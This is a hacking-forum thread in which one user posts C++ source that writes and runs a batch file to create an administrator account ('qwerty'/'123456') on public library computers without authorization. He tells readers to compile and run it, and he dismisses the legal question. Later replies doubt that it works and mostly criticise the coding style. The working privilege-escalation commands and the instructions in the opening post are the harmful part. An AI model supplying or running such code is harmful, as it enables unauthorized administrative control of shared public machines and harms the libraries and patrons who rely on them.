experiment

[Supfresh]

curious to see if this will work at other places.

if you're at public library, or in any public computer place for that matter, compile the code (C++) and drag the .exe to the desktop (of the public user account). Should create a local admin account: usrnm: qwerty passwrd: 123456 without previously having admin privledges.

You can do the same thing in a batch file this program just automates it and changes the screen resolution since my library uses a reaaally low screen res. The code's there to change the username/password just remove the comment tags.

As far as legality, you're on a public account in a public library, and at least at my library, there are no (at least not visable anywhere) TOC's you must agree too (most likely due to the fact that each computer has the image/registry restored on reboot and the image is stored on the server which you dont have access too) but ymmv, also this isnt really a hack, more a backdoor that's been perposely left open that you've stumbled upon.

Code: Select all

//Library Local Admin- batch file exploit
#include <iostream>
#include <string>
#include <fstream>
#include <stdlib.h>
#include <windows.h>
#include <Winuser.h>
#include <wingdi.h>

using namespace std;

void createaccount();
void deleteaccount();
int x,i; //global counter variables
int main ()
{

  begin:
  string intro;   
  intro = "0";
  cout << "***SUPFRESH***\n\n";
  cout << ("WHAT WOULD YOU LIKE TO DO? \n(1)CREATE ACCOUNT \n(2)DELETE ACCOUNT\n");
  cin >> intro;
  if (intro == "1")
     createaccount();
  else if (intro =="2")
       deleteaccount();
  else if ((intro != "1") && (intro != "2"))
  {
       cout << "INVALID INPUT\n\n";
       goto begin;
  }
  return 0;

}
void createaccount()
{
//creates and writes to the .bat file with user input
  start1:
  system("cls");
  string usrname = "qwerty";
  string psswrd = "123456";
  string ans = "Y";
 
  ofstream Adminfile;
  Adminfile.open("C:\\admin.bat",ios::out);
  //cout << "USERNAME: ";
  //cin >> usrname;
  //cout << "PASSWORD: ";
  //cin >> psswrd; 
  Adminfile << "net user " << usrname << " " << psswrd << " /add \n";
  Adminfile <<"net localgroup administrators " << usrname << " /add ";
 
  //cout << "\n\nUSERNAME: " << usrname << "\n" << "PASSWORD: " << psswrd;
  //cout << "\nCORRECT (y/n)? \n";
  //cin >> ans;
 
  if (ans == "N" | ans == "n" )
  {
     goto start1;
     }
  else
  {
       Adminfile.close();
       
       ShellExecute(NULL,"open","C:\\admin.bat", NULL,"C:\\", SW_SHOW); //creates admin account
       
             
       /****************changes display settings globally**********************************/
       DEVMODE dvmd;
       ZeroMemory(&dvmd, sizeof(dvmd));
       dvmd.dmSize = sizeof(DEVMODE);
       dvmd.dmPelsWidth = 1280 ;
       dvmd.dmFields |= DM_PELSWIDTH;
       dvmd.dmPelsHeight = 1024;
       dvmd.dmFields |= DM_PELSHEIGHT;
       dvmd.dmBitsPerPel = 32;
       dvmd.dmFields |= DM_BITSPERPEL;
       dvmd.dmDriverExtra = 0;
     
       ChangeDisplaySettingsEx(NULL,&dvmd,NULL, CDS_GLOBAL | CDS_UPDATEREGISTRY,NULL );
       /**********************************************************************************/
       
       for (i=0;i<9999;i++){
           for (x=0;x<19999;x++){}    //counter to allow time for account changes before logoff
           cout<< "...SUPFRESH...";
           }
       
       
      ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\logoff.exe", NULL,"C:\\", SW_SHOW);

       
  }
}
void deleteaccount()
{
//deletes the user created admin account and revertes display change
  start2:
  system("cls");
  string usrname = "qwerty";
  string ans ="Y";
 
  ofstream Adminfile;
  Adminfile.open("C:\\admin.bat",ios::out);
  //system("net user");
   
  //cout << "USERNAME TO DELETE: ";
  //cin >> usrname;
  //cout << "ARE YOU SURE (Y/N)? \n";
  //cin >> ans;
  if (ans == "N" | ans == "n" )
  {
     goto start2;
     }
  else
  {
       Adminfile << "net user " <<usrname<<" "<<"/delete";
       Adminfile.close();
       ShellExecute(NULL,"open","C:\\admin.bat", NULL,"C:\\", SW_SHOW);
       
       /*****************************restores display settings to default****************************/
       DEVMODE dvmd;
       ZeroMemory(&dvmd, sizeof(dvmd));
       dvmd.dmSize = sizeof(DEVMODE);
       dvmd.dmPelsWidth = 1024 ;
       dvmd.dmFields |= DM_PELSWIDTH;
       dvmd.dmPelsHeight = 768;
       dvmd.dmFields |= DM_PELSHEIGHT;
       dvmd.dmBitsPerPel = 32;
       dvmd.dmFields |= DM_BITSPERPEL;
       dvmd.dmDriverExtra = 0;
     
       ChangeDisplaySettingsEx(NULL,&dvmd,NULL, CDS_GLOBAL | CDS_UPDATEREGISTRY,NULL );
       /*********************************************************************************************/
       
       for (i=0;i<9999;i++){
           for (x=0;x<9999;x++){}    //counter to allow time for account changes before logoff
           cout<< "...SUPFRESH...";
           }
       
       ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\logoff.exe", NULL,"C:\\", SW_SHOW); //logoff
       
  }
     

}



[Goatboy]

/me shudders at excessive use of goto

So basically it's just a wrapper around a batch file...

[Supfresh]

/me shudders at excessive use of goto

So basically it's just a wrapper around a batch file...

goto is easy and for simple programs you rarely run into problems with it and it tends to be neater (in terms of reading the code) , and yes, the purpose of the program is to make it easier/ faster since i use it everytime i login, the post was more to see how often this is enabled, since it seems like a weird thing for an admin to chose to allow on their network imo, so just wondering if its really that common.

[sanddbox]

I'm 90% sure this won't work without admin privileges. Yes, about a year before I found HTS I was one of those kids looking up teh 1337 h4x0r batch files (thank god I never found hackforums) and I recall needing administrator privileges.

[Supfresh]

i dont know, i was just messing around with batch files for something else (school stuff) and found out net user worked on these computers without admin privileges, googled it, and discovered it's a pretty common "hack" on xp machines. So im 100% sure it does work some of the time.

[fabianhjr]

I'm 90% sure this won't work without admin privileges. Yes, about a year before I found HTS I was one of those kids looking up teh 1337 h4x0r batch files (thank god I never found hackforums) and I recall needing administrator privileges.

I am with you on that. We need to rescue kids from that awful fate.

UAC is implemented from Vista onwards. This is suppose to be similar to a sudo. The only difference is that M$ overthinked it and now you got a system full of holes. I saw recently that a way to bypass UAC had been released; M$ is in deep problems. Other than that. You don't need C++ for a batch file! D:<

[Supfresh]

Other than that. You don't need C++ for a batch file! D:<

You can do the same thing in a batch file this program just automates it and changes the screen resolution since my library uses a reaaally low screen res

its faster, cleaner, and you cant change resolution/freq with the standard cmd prompt cmds, as well as a few other things that i removed from the code that i posted.

[thetan]

Executing batch files from C++ is not cleaner and it's not faster. At best it's a nasty slow and inefficient hack.

For every batch script executed a batch interpreter must be loaded into memory or forked out of memory (computationally expensive) The entire batch file must then be lexically analyzed into a token stream and them stepped through with a parsing grammar (computationally expensive and latency bound due to disk IO), then for every program executed within that batch file, that program must be loaded into memory from disk (added latency due to disk IO), an ~8mb stack must be allocated for that program (not a cheap operation)

also:

for (i=0;i<9999;i++){
for (x=0;x<19999;x++){} //counter to allow time for account changes before logoff
cout<< "...SUPFRESH...";
}

create a proper timer, this is a horribly implemented time based spin lock that wastes CPU

[msbachman]

(thank god I never found hackforums)

I had an account on there that I logged into today; couldn't much remember much about that site, really.

Something that did intrigue me was this though:

[URL=http://imgur.com/r3kMp]
[URL=http://imgur.com/KYZ1N]


The main thing that I dislike about that site is here I might learn something from about 1/3 of the comments; there, the amount of 'trash' is unbelievable.

And then there's this piece of gold.

[sanddbox]

(thank god I never found hackforums)

I had an account on there that I logged into today; couldn't much remember much about that site, really.

Something that did intrigue me was this though:

[URL=http://imgur.com/r3kMp]
[URL=http://imgur.com/KYZ1N]

That's to be expected. What are the skids more drawn to - a huge hacking forum with plenty of viruses, tools, etc to download, or a site like this that teaches far more but has far less "become a hacker quick" type garbage?